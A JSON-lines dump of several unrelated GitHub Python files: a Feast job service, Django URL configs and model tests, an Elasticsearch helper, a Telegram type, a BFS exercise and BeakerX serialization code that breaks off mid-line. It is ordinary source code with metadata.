[client.feature_store.project]\n )\n if client.config.exists(opt.WHITELISTED_PROJECTS):\n whitelisted_projects = client.config.get(opt.WHITELISTED_PROJECTS)\n if whitelisted_projects:\n whitelisted_projects = whitelisted_projects.split(\",\")\n projects = [\n project for project in projects if project in whitelisted_projects\n ]\n\n expected_job_hash_to_tables = _get_expected_job_hash_to_tables(client, projects)\n\n expected_job_hashes = set(expected_job_hash_to_tables.keys())\n\n jobs_by_hash: Dict[str, StreamIngestionJob] = {}\n # when we want to retry failed jobs, we shouldn't include terminated jobs here\n # thus, Control Loop will behave like no job exists and will spawn new one\n for job in client.list_jobs(\n include_terminated=not client.config.getboolean(\n opt.JOB_SERVICE_RETRY_FAILED_JOBS\n )\n ):\n if (\n isinstance(job, StreamIngestionJob)\n and job.get_status() != SparkJobStatus.COMPLETED\n ):\n jobs_by_hash[job.get_hash()] = job\n\n existing_job_hashes = set(jobs_by_hash.keys())\n\n job_hashes_to_cancel = existing_job_hashes - expected_job_hashes\n job_hashes_to_start = expected_job_hashes - existing_job_hashes\n\n logger.debug(\n f\"existing_job_hashes = {sorted(list(existing_job_hashes))} \"\n f\"expected_job_hashes = {sorted(list(expected_job_hashes))}\"\n )\n\n for job_hash in job_hashes_to_start:\n # Any job that we wish to start should be among expected table refs map\n project, feature_table = expected_job_hash_to_tables[job_hash]\n logger.warning(\n f\"Starting a stream ingestion job for project={project}, \"\n f\"table_name={feature_table.name} with job_hash={job_hash}\"\n )\n client.start_stream_to_online_ingestion(feature_table, [], project=project)\n\n # prevent scheduler from peak load\n time.sleep(client.config.getint(opt.JOB_SERVICE_PAUSE_BETWEEN_JOBS))\n\n for job_hash in job_hashes_to_cancel:\n job = jobs_by_hash[job_hash]\n if job.get_status() != SparkJobStatus.IN_PROGRESS:\n logger.warning(\n f\"Can't cancel job with job_hash={job_hash} job_id={job.get_id()} status={job.get_status()}\"\n )\n continue\n\n logger.warning(\n f\"Cancelling a stream ingestion job with job_hash={job_hash} job_id={job.get_id()} status={job.get_status()}\"\n )\n try:\n job.cancel()\n except FailedPrecondition as exc:\n logger.error(f\"Job canceling failed with exception {exc}\")\n","repo_name":"Azure/feast-azure","sub_path":"cluster/sdk/python/feast_spark/job_service.py","file_name":"job_service.py","file_ext":"py","file_size_in_byte":17578,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"2"} +{"seq_id":"18071140533","text":"\"\"\"paperview URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('admin/', admin.site.urls), # Don't touch this, pregenerated\n path('', views.index, name='index'),\n\n # Test paths, delete these eventually\n path('listnames/', views.listnames, name='listnames'),\n path('echopostdata/', views.echopostdata, name='echopostdata'),\n path('tothelimit/', views.tothelimit, name='tothelimit'),\n path('addname/', views.addname, name='addname'),\n path('search/test/', views.searchForName, name='search_test'),\n path('graphtest', views.graphTest, name='Graph test'),\n # End of test paths\n\n path('search/author', views.search_for_author, name = 'search_for_author'),\n path('search/article', views.search_for_article, name = 'search_for_article'),\n path('search/interest', views.search_for_interest, name = 'search_for_interest'),\n\tpath('author/', views.specific_author, name = 'specific_author'),\n path('article/', views.specific_article, name = 'specific_article'),\n path('new/author/', views.new_author, name = 'new_author'),\n path('new/article/', views.new_article, name = 'new_article'),\n]\n","repo_name":"michaelvdow/PaperView","sub_path":"back-end/server/paperview/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23663338487","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.views.generic import RedirectView\n\n\nurlpatterns = [\n path('favicon.ico',RedirectView.as_view(url='static/img/favicon.ico')),\n path('', include('index.urls')),\n path('article/', include('article.urls')),\n path('note/', include('note.urls')),\n path('book/', include('book.urls')),\n path('admin/', admin.site.urls),\n]\n","repo_name":"HanZhenYe/Blog","sub_path":"blog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19782047780","text":"from lib.connection import Connection\nfrom lib.result import acknowledge_result\n\nclass Cluster(object):\n \"\"\"\n This class provides access to ElasticSearch cluster management features.\n \"\"\"\n\n def __init__(self, host_name, port_number):\n \"\"\"\n Instantiate object with the following parameters:\n host_name ElasticSearch host name\n port_number ElasticsSearch API port number\n \"\"\"\n self.es_connection = Connection(host_name, port_number)\n\n def cluster_health(self, index_name):\n \"\"\"\n Display basic cluster health information, or if index is specified, of that index.\n index_name Index to get health status on\n \"\"\"\n es = self.es_connection.get_connection()\n if index_name == \"_all\":\n result = es.cluster.health()\n else:\n result = es.cluster.health(index=index_name)\n\n # Print an error if one occurred\n acknowledge_result(result)","repo_name":"arktos65/elasticsearch-tools","sub_path":"lib/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"9692382328","text":"from .base import TelegramStructure, Field, ListField\n\n\nclass WebhookInfo(TelegramStructure):\n\n url = Field()\n has_custom_certificate = Field()\n pending_update_count = Field()\n last_error_date = Field()\n last_error_message = Field()\n max_connections = Field()\n allowed_update = Field()\n\n def __init__(self,\n url: str,\n has_custom_certificate: bool,\n pending_update_count: int,\n last_error_date: int = None,\n last_error_message: str = None,\n max_connections: int = None,\n allowed_update: list = None\n ):\n self.url = \\\n Field(url, [str])\n\n self.has_custom_certificate = \\\n Field(has_custom_certificate, [bool])\n\n self.pending_update_count = \\\n Field(pending_update_count, [int])\n\n self.last_error_date = \\\n Field(last_error_date, [int])\n\n self.last_error_message = \\\n Field(last_error_message, [str])\n\n self.max_connections = \\\n Field(max_connections, [int])\n\n self.allowed_update = \\\n ListField(allowed_update, [str])\n","repo_name":"cmd410/OrigamiBot","sub_path":"origamibot/core/teletypes/webhook_info.py","file_name":"webhook_info.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"2"} +{"seq_id":"20756255493","text":"\"\"\"\nC-14.51 Provide an implementation of the BFS algorithm that uses a FIFO queue,\nrather than a level-by-level formulation, to manage vertices that have been\ndiscovered until the time when their neighbors are considered.\n\"\"\"\n\nfrom collections import deque\n\ndef bfs(g, u, discovered):\n \"\"\"\n bfs using fifo queue\n \"\"\"\n q = deque()\n q.append(u)\n\n while len(q) > 0:\n print(q)\n v = q.popleft()\n for e in g.incident_edges(v):\n new_v = e.opposite(v)\n if new_v not in discovered:\n discovered[new_v] = e\n q.append(new_v)\n\nif __name__ == \"__main__\":\n from shared_14_chapter import Graph\n\n g = Graph()\n v1 = g.insert_vertex(element='v1')\n v2 = g.insert_vertex(element='v2')\n v3 = g.insert_vertex(element='v3')\n v4 = g.insert_vertex(element='v4')\n v5 = g.insert_vertex(element='v5')\n e1 = g.insert_edge(v1, v2, element='e1')\n e2 = g.insert_edge(v1, v3, element='e2')\n e3 = g.insert_edge(v2, v3, element='e3')\n e4 = g.insert_edge(v3, v4, element='e4')\n e5 = g.insert_edge(v3, v5, element='e5')\n\n discovered = {v1: None}\n bfs(g, v1, discovered)\n assert len(discovered) == 5\n","repo_name":"aleksandarbos/solutions-for-data-structures-and-algorithms-in-python","sub_path":"c-14.51.py","file_name":"c-14.51.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"41454600453","text":"from rest_framework.views import APIView\n# from app.lib.response import ApiResponse\n# from app.users.views import UserProfile\n# from Winalytics.apps.approach.models import Approach\nfrom rest_framework.authtoken.models import Token\nfrom django.views.generic.edit import UpdateView\n# import itertools\n# import operator\n\n\nclass AccessUserObj:\n\n\tdef fromToken(self,request):\n\t\ttoken = request.META['HTTP_AUTHORIZATION'].replace(\"Token\",\"\")\t\n\t\treturn Token.objects.get(key=str(token).strip())\n\n# class PostCommonMethods:\n\n# \tdef getCreatedByName(obj):\n# \t\ttry:\n\t\t\t\n# \t\t\tuserProfile = UserProfile.objects.get(user_id = obj.created_by)\n\t\t\t\n# \t\t\treturn userProfile.fname\n# \t\texcept Exception as err:\n# \t\t\tprint(err)\n# \t\t\treturn None\t\n\n# class PhaseLib:\n\n# \tdef CheckPhaseExist(self, request, args):\n# \t\ttry:\n# \t\t\tphase = Phase.objects.filter(**args).get(id=request.data.get('phase'))\n# \t\t\tprint(phase.id)\n# \t\t\tif int(phase.id) is None:\n# \t\t\t\treturn True\n# \t\t\treturn False\n# \t\texcept Exception as err:\n# \t\t\tprint(err)\n# \t\t\treturn True\t\n\nclass RequestOverwrite(UpdateView):\n\n\tdef overWriteUserId(self, request, dic):\n\t\ttry:\n\t\t\tif request.POST._mutable is False:\n\t\t\t\trequest.POST._mutable = True\n\t\t\t\n\t\t\tfor key,value in dic.items():\n\t\t\t\trequest.POST[key] = value\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\t\treturn False\n\n\tdef overWrite(self, request, dic):\n\t\ttry:\n\t\t\ttry:\n\t\t\t\tif request.data._mutable is False:\n\t\t\t\t\trequest.data._mutable = True\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tfor key,value in dic.items():\n\t\t\t\trequest.data[key] = value\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\t\treturn False\n\n# class CheckExistance():\n# \tdef isExists(self,Object,filter):\n# \t\tobj = Object.objects.filter(**filter)\n\n# \t\tif obj.exists():\n# \t\t\treturn True\n# \t\treturn False\t\t\t\n\n\n# class Common():\n# \tdef most_common(self, L):\n# \t # get an iterable of (item, iterable) pairs\n# \t SL = sorted((x, i) for i, x in enumerate(L))\n# \t # print 'SL:', SL\n# \t groups = itertools.groupby(SL, key=operator.itemgetter(0))\n# \t # auxiliary function to get \"quality\" for an item\n# \t def _auxfun(g):\n# \t item, iterable = g\n# \t count = 0\n# \t min_index = len(L)\n# \t for _, where in iterable:\n# \t count += 1\n# \t min_index = min(min_index, where)\n# \t # print 'item %r, count %r, minind %r' % (item, count, min_index)\n# \t return count, -min_index\n# \t # pick the highest-count/earliest item\n# \t return max(groups, key=_auxfun)[0]\n","repo_name":"hemant2113/instaspiel","sub_path":"app/lib/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17242870702","text":"from django.test import TestCase\nfrom django.core.exceptions import ValidationError\nfrom enbalde.models import Envio, TipoArticulo, Oferta, Usuario, Carrito, Articulo, Seleccion, Venta\nfrom django.utils import timezone\nfrom ddt import ddt, data\n\n\n# Create your tests here.\n\n# TODO: Envio.monto podria tener default en 0\n# TODO: Articulo.precio no puede ser menor que Articulo.costo\n\nUSUARIO = \"jperez\"\nCLAVE = \"123456\"\nNOMBRE = \"Juan\"\nAPELLIDO = \"Perez\"\nDIRECCION = \"Calle Siempreviva 123\"\nTELEFONO = \"1234-5678\"\nOBSERVACIONES = \"Buen cliente\"\nFECHA_FUTURA = timezone.datetime(2099, 5, 30, tzinfo=timezone.get_current_timezone())\nFECHA_PASADA = timezone.datetime(2020, 5, 30, tzinfo=timezone.get_current_timezone())\nARTICULO = \"Helado de chocolate\"\nDESCRIPCION = \"Un helado muy rico de chocolate con chips\"\nPRECIO = 1100\nCOSTO = 400\nIMAGEN = \"/assets/chocolate.png\"\nCANTIDAD = 13\nTIPO_ARTICULO = \"Balde\"\nOFERTA = \"10% Off\"\nENVIO = \"Retiro en tienda\"\nENVIO_MINUSCULA = ENVIO.lower()\n\n\ndef crear_usuario_completo():\n return Usuario.objects.create(username=USUARIO, password=CLAVE, first_name=NOMBRE,\n last_name=APELLIDO, direccion=DIRECCION, telefono=TELEFONO,\n observaciones=OBSERVACIONES, tipo=Usuario.TipoUsuario.CLIENTE)\n\n\ndef crear_tipo_de_articulo():\n return TipoArticulo.objects.create(nombre=TIPO_ARTICULO)\n\n\ndef crear_articulo(nombre=ARTICULO, descripcion=DESCRIPCION, precio=PRECIO, costo=COSTO, imagen=IMAGEN, cantidad=CANTIDAD):\n tipo_de_articulo = crear_tipo_de_articulo()\n return Articulo.objects.create(nombre=nombre, descripcion=descripcion, precio=precio, costo=costo, imagen=imagen,\n cantidad=cantidad, tipo=tipo_de_articulo)\n\n\ndef crear_envio(nombre=ENVIO, monto=0):\n return Envio.objects.create(nombre=nombre, monto=monto)\n\n\ndef crear_carrito(fecha=FECHA_FUTURA):\n cliente = crear_usuario_completo()\n return Carrito.objects.create(cliente=cliente, fecha=fecha)\n\n\ndef crear_oferta(nombre=OFERTA, descuento=10, fecha_vencimiento=FECHA_FUTURA):\n return Oferta.objects.create(nombre=nombre, descuento=descuento, fecha_vencimiento=fecha_vencimiento)\n\n\ndef crear_venta(numero=1, comprobante=2, fecha=FECHA_PASADA, total=1500):\n envio = crear_envio()\n carrito = crear_carrito()\n return Venta.objects.create(numero=numero, comprobante=comprobante, fecha=fecha, total=total, envio=envio, carrito=carrito)\n\n\nclass EnvioTestCase(TestCase):\n def test_envio_se_inicializa_correctamente(self):\n sut = crear_envio()\n self.assertEqual(ENVIO, sut.nombre)\n self.assertEqual(0, sut.monto)\n\n def test_nombre_es_el_string_por_defecto_de_envio(self):\n sut = crear_envio()\n self.assertEqual(ENVIO, sut.__str__())\n self.assertEqual(ENVIO, sut.__unicode__())\n\n def test_monto_no_puede_ser_negativo(self):\n sut = crear_envio(monto=-1)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.\"):\n sut.full_clean()\n\n\nclass TipoArticuloTestCase(TestCase):\n def test_tipo_articulo_se_inicializa_correctamente(self):\n sut = crear_tipo_de_articulo()\n self.assertEqual(TIPO_ARTICULO, sut.nombre)\n\n def test_nombre_es_el_string_por_defecto_de_envio(self):\n sut = crear_tipo_de_articulo()\n self.assertEqual(TIPO_ARTICULO, sut.__str__())\n self.assertEqual(TIPO_ARTICULO, sut.__unicode__())\n\n\n@ddt\nclass OfertaTestCase(TestCase):\n def test_oferta_se_inicializa_correctamente(self):\n sut = crear_oferta()\n self.assertEqual(OFERTA, sut.nombre)\n self.assertEqual(10, sut.descuento)\n self.assertEqual(FECHA_FUTURA, sut.fecha_vencimiento)\n\n @data(0, -1)\n def test_descuento_no_puede_ser_invalido(self, descuento_invalido: int):\n sut = crear_oferta(descuento=descuento_invalido)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.01.\"):\n sut.full_clean()\n\n def test_fecha_de_vencimiento_no_puede_ser_pasada(self):\n sut = crear_oferta(fecha_vencimiento=FECHA_PASADA)\n with self.assertRaisesMessage(ValidationError, \"La fecha no puede ser pasada.\"):\n sut.full_clean()\n\n def test_nombre_es_el_string_por_defecto_de_oferta(self):\n sut = crear_oferta()\n self.assertEqual(OFERTA, sut.__str__())\n self.assertEqual(OFERTA, sut.__unicode__())\n\n\nclass UsuarioTestCase(TestCase):\n def test_usuario_se_inicializa_correctamente(self):\n sut = crear_usuario_completo()\n self.assertEqual(USUARIO, sut.username)\n self.assertEqual(CLAVE, sut.password)\n self.assertEqual(NOMBRE, sut.first_name)\n self.assertEqual(APELLIDO, sut.last_name)\n self.assertEqual(DIRECCION, sut.direccion)\n self.assertEqual(TELEFONO, sut.telefono)\n self.assertEqual(OBSERVACIONES, sut.observaciones)\n self.assertEqual(Usuario.TipoUsuario.CLIENTE, sut.tipo)\n\n def test_nombre_es_el_string_por_defecto_de_usuario(self):\n sut = Usuario.objects.create(first_name=NOMBRE, last_name=APELLIDO)\n self.assertEqual(NOMBRE, sut.__str__())\n self.assertEqual(NOMBRE, sut.__unicode__())\n\n\nclass CarritoTestCase(TestCase):\n def test_carrito_se_inicializa_correctamente(self):\n sut = crear_carrito()\n self.assertEqual(USUARIO, sut.cliente.username)\n self.assertEqual(FECHA_FUTURA, sut.fecha)\n\n def test_fecha_no_puede_ser_pasada(self):\n sut = crear_carrito(fecha=FECHA_PASADA)\n with self.assertRaisesMessage(ValidationError, \"La fecha no puede ser pasada.\"):\n sut.full_clean()\n\n def test_nombre_del_cliente_del_carrito_es_el_string_por_defecto_de_carrito(self):\n nombre_del_carrito = f\"Carrito de {NOMBRE}\"\n sut = crear_carrito()\n self.assertEqual(nombre_del_carrito, sut.__str__())\n self.assertEqual(nombre_del_carrito, sut.__unicode__())\n\n\n@ddt\nclass ArticuloTestCase(TestCase):\n def test_articulo_se_inicializa_correctamente(self):\n sut = crear_articulo()\n self.assertEqual(ARTICULO, sut.nombre)\n self.assertEqual(DESCRIPCION, sut.descripcion)\n self.assertEqual(PRECIO, sut.precio)\n self.assertEqual(COSTO, sut.costo)\n self.assertEqual(IMAGEN, sut.imagen)\n self.assertEqual(CANTIDAD, sut.cantidad)\n self.assertEqual(TIPO_ARTICULO, sut.tipo.nombre)\n\n def test_cantidad_no_puede_ser_negativa(self):\n sut = crear_articulo(cantidad=-1)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.\"):\n sut.full_clean()\n\n @data(0, -1)\n def test_precio_no_puede_ser_invalida(self, precio_invalido):\n sut = crear_articulo(precio=precio_invalido)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.01.\"):\n sut.full_clean()\n\n def test_costo_no_puede_ser_negativo(self):\n sut = crear_articulo(costo=-1)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.\"):\n sut.full_clean()\n\n def test_nombre_del_articulo_es_el_string_por_defecto_de_articulo(self):\n sut = crear_articulo()\n self.assertEqual(ARTICULO, sut.__str__())\n self.assertEqual(ARTICULO, sut.__unicode__())\n\n\nclass SeleccionTestCase(TestCase):\n def test_seleccion_se_inicializa_correctamente(self):\n articulo = crear_articulo()\n carrito = crear_carrito()\n sut = Seleccion.objects.create(cantidad=2, carrito=carrito, articulo=articulo)\n self.assertEqual(ARTICULO, sut.articulo.nombre)\n self.assertEqual(NOMBRE, sut.carrito.cliente.first_name)\n self.assertEqual(2, sut.cantidad)\n\n def test_cantidad_no_puede_ser_cero(self):\n articulo = crear_articulo()\n carrito = crear_carrito()\n sut = Seleccion.objects.create(cantidad=0, carrito=carrito, articulo=articulo)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 1.\"):\n sut.full_clean()\n\n def test_nombre_de_la_seleccion_es_el_articulo_dentro_del_carrito(self):\n descripcion = f\"{ARTICULO} dentro de carrito 1 de {NOMBRE}\"\n articulo = crear_articulo()\n carrito = crear_carrito()\n sut = Seleccion.objects.create(cantidad=2, carrito=carrito, articulo=articulo)\n self.assertEqual(descripcion, sut.__str__())\n self.assertEqual(descripcion, sut.__unicode__())\n\n\n@ddt\nclass VentaTestCase(TestCase):\n def test_venta_se_inicializa_correctamente(self):\n sut = crear_venta()\n self.assertEqual(1, sut.numero)\n self.assertEqual(2, sut.comprobante)\n self.assertEqual(FECHA_PASADA, sut.fecha)\n self.assertEqual(1500, sut.total)\n self.assertEqual(ENVIO, sut.envio.nombre)\n self.assertEqual(NOMBRE, sut.carrito.cliente.first_name)\n\n def test_la_fecha_de_venta_no_puede_ser_futura(self):\n sut = crear_venta(fecha=FECHA_FUTURA)\n with self.assertRaisesMessage(ValidationError, \"La fecha no puede ser futura.\"):\n sut.full_clean()\n\n @data(0, -1)\n def test_el_total_no_puede_ser_invalido(self, total_invalido):\n sut = crear_venta(total=total_invalido)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.01.\"):\n sut.full_clean()\n\n def test_descripcion_de_venta_es_el_string_por_defecto(self):\n descripcion = f\"Venta a {NOMBRE} por 1500 con {ENVIO_MINUSCULA}\"\n sut = crear_venta()\n self.assertEqual(descripcion, sut.__str__())\n self.assertEqual(descripcion, sut.__unicode__())\n","repo_name":"NataliaAlvarezIspc/proyecto-ispc-ecommerce","sub_path":"back-end/django/enbalde/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9752,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"30605835840","text":"import base64\nimport datetime\nimport json\nimport math\nimport os\nimport time\nimport urllib.error\nimport urllib.parse\nimport urllib.request\n\nimport IPython\nimport numpy\nimport pandas\nimport requests\nfrom IPython import get_ipython\nfrom beakerx_base import BaseObject, BeakerxHTML\n\ntry:\n from beakerx_tabledisplay import TableDisplay\nexcept ModuleNotFoundError:\n TableDisplay = None\ntry:\n from beakerx_tabledisplay.table_display_runtim import BeakerXTabledisplay\nexcept ModuleNotFoundError:\n BeakerXTabledisplay = None\n\nfrom beakerx.plots import chart\nfrom beakerx.forms import easyforms\nfrom ipykernel.comm import Comm\nfrom traitlets import Unicode\n\n\nclass OutputContainer:\n def __init__(self):\n self.items = []\n\n def clear(self):\n self.items = []\n\n def addItem(self, obj):\n self.items.append(obj)\n\n def getItems(self):\n return self.items\n\n\nclass BeakerCodeCell:\n def __init__(self, cellId, evaluatorId):\n self.cellId = cellId\n self.evaluatorId = evaluatorId\n self.code = ''\n self.outputtype = ''\n self.output = None\n self.tags = ''\n\n def getCellId(self):\n return self.cellId\n\n def getEvaluatorId(self):\n return self.evaluatorId\n\n def getCode(self):\n return self.code\n\n def getOutputType(self):\n return self.outputtype\n\n def getOutput(self):\n return self.output\n\n def getTags(self):\n return self.tags\n\n\ndef convertTypeName(typ):\n if typ.startswith(\"float\"):\n return \"double\"\n if typ.startswith(\"int\") or typ.startswith(\"uint\") or typ.startswith(\"short\") or typ.startswith(\n \"ushort\") or typ.startswith(\"long\") or typ.startswith(\"ulong\"):\n return \"integer\"\n if typ.startswith(\"bool\"):\n return \"boolean\"\n if typ.startswith(\"date\") or typ.startswith(\"Time\"):\n return \"datetime\"\n return \"string\"\n\n\ndef isPrimitiveType(typ):\n if typ.startswith(\"float\"):\n return True\n if typ.startswith(\"int\") or typ.startswith(\"uint\") or typ.startswith(\"short\") or typ.startswith(\n \"ushort\") or typ.startswith(\"long\") or typ.startswith(\"ulong\"):\n return True\n if typ.startswith(\"bool\"):\n return True\n if typ.startswith(\"date\") or typ.startswith(\"Time\"):\n return True\n if typ.startswith(\"str\"):\n return True\n return False\n\n\ndef isListOfMaps(data):\n if type(data) != list:\n return False\n for w in data:\n if type(w) != dict:\n return False\n for v in w.values():\n if not isPrimitiveType(type(v).__name__):\n return False\n return True\n\n\ndef isDictionary(data):\n if type(data) != dict:\n return False\n for v in data.values():\n if not isPrimitiveType(type(v).__name__):\n return False\n return True\n\n\ndef transformNaN(obj):\n if not isinstance(obj, float):\n return obj\n if math.isnan(obj):\n return \"NaN\"\n if math.isinf(obj):\n if obj > 0:\n return \"Infinity\"\n else:\n return \"-Infinity\"\n return obj\n\n\ndef transformNaNs(obj):\n for x in range(0, len(obj)):\n i = obj[x]\n if not isinstance(i, float):\n continue\n if math.isnan(i):\n obj[x] = \"NaN\"\n if math.isinf(i):\n if i > 0:\n obj[x] = \"Infinity\"\n else:\n obj[x] = \"-Infinity\"\n\n\ndef fixNaNBack(obj):\n if not isinstance(obj, str):\n return obj\n if obj == \"NaN\":\n return float('nan')\n if obj == \"Infinity\":\n return float('inf')\n if obj == \"-Infinity\":\n return float('-inf')\n return obj\n\n\ndef fixNaNsBack(obj):\n for x in range(0, len(obj)):\n i = obj[x]\n if not isinstance(i, str):\n continue\n if i == \"NaN\":\n obj[x] = float('nan')\n if i == \"Infinity\":\n obj[x] = float('inf')\n if i == \"-Infinity\":\n obj[x] = float('-inf')\n\n\ndef transform(obj):\n if type(obj) == bytes:\n return str(obj)\n if isListOfMaps(obj):\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"ListOfMaps\"\n cols = []\n for l in obj:\n cols.extend(l.keys())\n cols = list(set(cols))\n out['columnNames'] = cols\n vals = []\n for l in obj:\n row = []\n for r in cols:\n if r in l:\n row.append(transform(l[r]))\n else:\n row.append('')\n vals.append(row)\n out['values'] = vals\n return out\n if isDictionary(obj):\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"Dictionary\"\n out['columnNames'] = [\"Key\", \"Value\"]\n values = []\n for k, v in obj.items():\n values.append([k, transform(v)])\n out['values'] = values\n return out\n if type(obj) == dict:\n out = {}\n for k, v in obj.items():\n out[k] = transformNR(v)\n return out\n if type(obj) == list:\n out = []\n for v in obj:\n out.append(transformNR(v))\n return out\n if isinstance(obj, OutputContainer):\n out = {}\n out['type'] = \"OutputContainer\"\n items = []\n for v in obj.getItems():\n items.append(transform(v))\n out['items'] = items\n return out\n if isinstance(obj, BeakerCodeCell):\n out = {}\n out['type'] = \"BeakerCodeCell\"\n out['cellId'] = obj.getCellId()\n out['evaluatorId'] = obj.getEvaluatorId()\n out['code'] = obj.getCode()\n out['outputtype'] = obj.getOutputType()\n out['output'] = transformNR(obj.getOutput())\n out['tags'] = obj.getTags()\n return out\n if isinstance(obj, BaseObject):\n return obj.transform()\n return transformNaN(obj)\n\n\ndef transformNR(obj):\n if type(obj) == bytes:\n return str(obj)\n if type(obj) == dict:\n out = {}\n for k, v in obj.items():\n out[k] = transformNR(v)\n return out\n if type(obj) == list:\n out = []\n for v in obj:\n out.append(transformNR(v))\n return out\n if isinstance(obj, OutputContainer):\n out = {}\n out['type'] = \"OutputContainer\"\n items = []\n for v in obj.getItems():\n items.append(transform(v))\n out['items'] = items\n return out\n if isinstance(obj, BeakerCodeCell):\n out = {}\n out['type'] = \"BeakerCodeCell\"\n out['cellId'] = obj.getCellId()\n out['evaluatorId'] = obj.getEvaluatorId()\n out['code'] = obj.getCode()\n out['outputtype'] = obj.getOutputType()\n out['output'] = transformNR(obj.getOutput())\n out['tags'] = obj.getTags()\n return out\n if isinstance(obj, BaseObject):\n return obj.transform()\n return transformNaN(obj)\n\n\ndef transformBack(obj):\n if type(obj) == dict:\n out = {}\n for k, v in obj.items():\n out[str(k)] = transformBack(v)\n if \"type\" in out:\n if out['type'] == \"Plot\" \\\n or out['type'] == \"TimePlot\" \\\n or out['type'] == \"NanoPlot\" \\\n or out['type'] == \"SimpleTimePlot\" \\\n or out['type'] == \"CombinedPlot\":\n return chart.transformBack(out)\n if out['type'] == 'EasyForm':\n return easyforms.transformBack(out)\n if out['type'] == \"BeakerCodeCell\":\n c = BeakerCodeCell(out['cellId'], out['evaluatorId'])\n if 'code' in out:\n c.code = out['code']\n if 'outputtype' in out:\n c.outputtype = out['outputtype']\n if 'output' in out:\n c.output = transformBack(out['output'])\n if 'tags' in out:\n c.tags = out['tags']\n return c\n if out['type'] == \"OutputContainer\":\n c = OutputContainer()\n if 'items' in out:\n for i in out['items']:\n c.addItem(i)\n return c\n if out['type'] == \"Date\":\n return datetime.fromtimestamp(out[\"timestamp\"] / 1000)\n if out['type'] == \"TableDisplay\":\n if 'subtype' in out:\n if out['subtype'] == \"Dictionary\":\n out2 = {}\n for r in out['values']:\n out2[r[0]] = fixNaNBack(r[1])\n if out['columnNames'][0] == \"Index\":\n return pandas.Series(out2)\n return out2\n if out['subtype'] == \"Matrix\":\n vals = out['values']\n fixNaNsBack(vals)\n return numpy.matrix(vals)\n if out['subtype'] == \"ListOfMaps\":\n out2 = []\n cnames = out['columnNames']\n for r in out['values']:\n out3 = {}\n for i in range(len(cnames)):\n if r[i] != '':\n out3[cnames[i]] = r[i]\n out2.append(out3)\n return out2\n # transform to dataframe\n if ('hasIndex' in out) and (out['hasIndex'] == \"true\"):\n # first column becomes the index\n vals = out['values']\n cnames = out['columnNames'][1:]\n index = []\n for x in range(0, len(vals)):\n index.append(transformBack(vals[x][0]))\n v = vals[x][1:]\n fixNaNsBack(v)\n vals[x] = v\n if len(out['indexName']) > 1:\n index = pandas.MultiIndex.from_tuples(index, names=(out['indexName']))\n else:\n index = pandas.Index(index, name=', '.join((out['indexName'])))\n frame = pandas.DataFrame(data=vals, columns=cnames, index=index)\n return frame\n else:\n vals = out['values']\n cnames = out['columnNames']\n for x in range(0, len(vals)):\n v = vals[x]\n fixNaNsBack(v)\n vals[x] = v\n return pandas.DataFrame(data=vals, columns=cnames)\n return out\n if type(obj) == list:\n out = []\n for v in obj:\n out.append(transformBack(v))\n return out\n try:\n if type(obj) == bytes:\n obj = str(obj)\n except Exception as e:\n return obj\n return obj\n\n\n# should be inner class to BeakerX\nclass DataFrameEncoder(json.JSONEncoder):\n def default(self, obj):\n # similarly handle Panels.\n # make this extensible by the user to handle their own types.\n if isinstance(obj, numpy.generic):\n return transformNaN(obj.item())\n if isinstance(obj, numpy.ndarray) and obj.ndim == 2:\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"Matrix\"\n cols = []\n for i in range(obj.shape[1]):\n cols.append(\"c\" + str(i))\n out['columnNames'] = cols\n vars = obj.tolist()\n for x in range(0, len(vars)):\n transformNaNs(vars[x])\n out['values'] = vars\n return out\n if isinstance(obj, numpy.ndarray):\n ret = obj.tolist()\n transformNaNs(ret)\n return ret\n if type(obj) == datetime or type(obj) == datetime.date or type(obj).__name__ == 'Timestamp':\n out = {}\n out['type'] = \"Date\"\n out['timestamp'] = time.mktime(obj.timetuple()) * 1000\n return out\n if type(obj) == 